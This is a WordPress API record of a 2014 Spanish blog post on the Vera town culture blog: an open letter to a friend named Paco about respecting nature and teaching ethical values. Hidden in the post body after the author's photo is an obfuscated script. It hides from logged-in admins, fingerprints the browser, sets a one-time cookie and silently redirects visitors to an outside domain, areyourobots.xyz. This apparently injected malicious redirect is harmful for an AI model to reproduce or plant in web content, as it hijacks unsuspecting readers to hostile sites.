{"id":508,"date":"2014-08-13T10:43:49","date_gmt":"2014-08-13T10:43:49","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=508"},"modified":"2015-11-23T10:32:29","modified_gmt":"2015-11-23T10:32:29","slug":"la-madre-naturaleza","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2014\/08\/13\/la-madre-naturaleza\/","title":{"rendered":"LA MADRE NATURALEZA"},"content":{"rendered":"<p><!-- p { margin-bottom: 0.25cm; direction: ltr; line-height: 120%; text-align: left; widows: 2; orphans: 2; } --><!-- p { margin-bottom: 0.25cm; direction: ltr; line-height: 120%; text-align: left; widows: 2; orphans: 2; } --><\/p>\n<p style=\"text-align: right\" align=\"justify\">(Carta abierta a mi amigo Paco Flores Soler (julio, 2.014)<\/p>\n<p style=\"text-align: justify\" align=\"justify\">Estimado amigo: Acuso recibo de tu sensibilidad por lo natural, lo bello y lo que hoy, lamentablemente, obviamos y, c\u00f3mo no, en nuestras profundas conversaciones, compartimos gustos coincidentes en aras a la protecci\u00f3n de la Madre Naturaleza y del d\u00e9bil en todos sus reinos y facetas. Nuestra condici\u00f3n humana, inteligente por privilegiada, ante la contemplaci\u00f3n de los desprop\u00f3sitos y amenazas que condicionan el sistema natural y, t\u00fa, por supuesto, me entiendes, lejos de profundizar en lo que conlleva el orden natural de las cosas, invierte, parad\u00f3jicamente, lo que creo entender, sentido l\u00f3gico y com\u00fan de las mismas.<\/p>\n<p style=\"text-align: justify\" align=\"justify\"><!--more--><\/p>\n<p style=\"text-align: justify\" align=\"justify\">Pues bien, ante eso me pregunto: \u00bf qu\u00e9 hacer ? La respuesta no puede ser nuestra rebeli\u00f3n ante el sin sentido y contra-natura. Ni t\u00fa ni yo somos la resistencia. Es cuesti\u00f3n, en el devenir del tiempo, desde los pilares b\u00e1sicos de la educaci\u00f3n: familia y escuela, educar en valores y principios \u00e9ticos que propicien el respeto y protecci\u00f3n por el orden natural y todo aquello que conlleve racionalidad y sentido com\u00fan. Ahora que me encuentro jubilado y se me brinda la oportunidad de escribir en \u00abIDEAL@LEVANTE\u00bb, \u201cwww.elindalico.es\u201d, Portalmanzora.es , y blog de Cultura del Excmo. Ayuntamiento de Vera, me complace decirte, amigo Paco, que, a mis apreciados y queridos alumnos, siempre y en todo momento, los eduqu\u00e9 en algo tan sencillo como hacer el bien y obviar el mal. Por ello, el respeto a la vida y a lo inanimado, en su may\u00fascula contemplaci\u00f3n, nos tendr\u00eda que hacer pensar, como te dije al principio, en el respeto a la Madre Naturaleza y, m\u00e1s concretamente, en la protecci\u00f3n al d\u00e9bil, como creo compartimos en nuestras charlas y a trav\u00e9s de redes sociales con m\u00e1ximas y fotos que nos causan profundo e intenso dolor cuando se agrede a la raz\u00f3n de ser y lo que nos rodea.<\/p>\n<p style=\"text-align: justify\" align=\"justify\">Un saludo, amigo Paco.<\/p>\n<p><figure id=\"attachment_23\" aria-describedby=\"caption-attachment-23\" style=\"width: 180px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/02\/150571_129346217122812_100001423032344_190639_1342949_a.jpg\"><img decoding=\"async\" class=\"size-full wp-image-23\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2014\/02\/150571_129346217122812_100001423032344_190639_1342949_a.jpg\" alt=\"Diego Morales Carmona\" width=\"180\" height=\"109\" \/><\/a><figcaption id=\"caption-attachment-23\" class=\"wp-caption-text\">Diego Morales Carmona<\/figcaption><\/figure><script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>(Carta abierta a mi amigo Paco Flores Soler (julio, 2.014) Estimado amigo: Acuso recibo de tu sensibilidad por lo natural, lo bello y lo que hoy, lamentablemente, obviamos y, c\u00f3mo no, en nuestras profundas conversaciones, compartimos gustos coincidentes en aras a la protecci\u00f3n de la Madre Naturaleza y del d\u00e9bil en todos sus reinos y &hellip; <a href=\"https:\/\/blog.vera.es\/cultura\/2014\/08\/13\/la-madre-naturaleza\/\" class=\"more-link\">Seguir leyendo <span class=\"screen-reader-text\">LA MADRE NATURALEZA<\/span> <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":509,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[20],"tags":[],"class_list":["post-508","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-colaboraciones"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/508","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=508"}],"version-history":[{"count":3,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/508\/revisions"}],"predecessor-version":[{"id":1686,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/508\/revisions\/1686"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/509"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=508"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=508"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=508"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}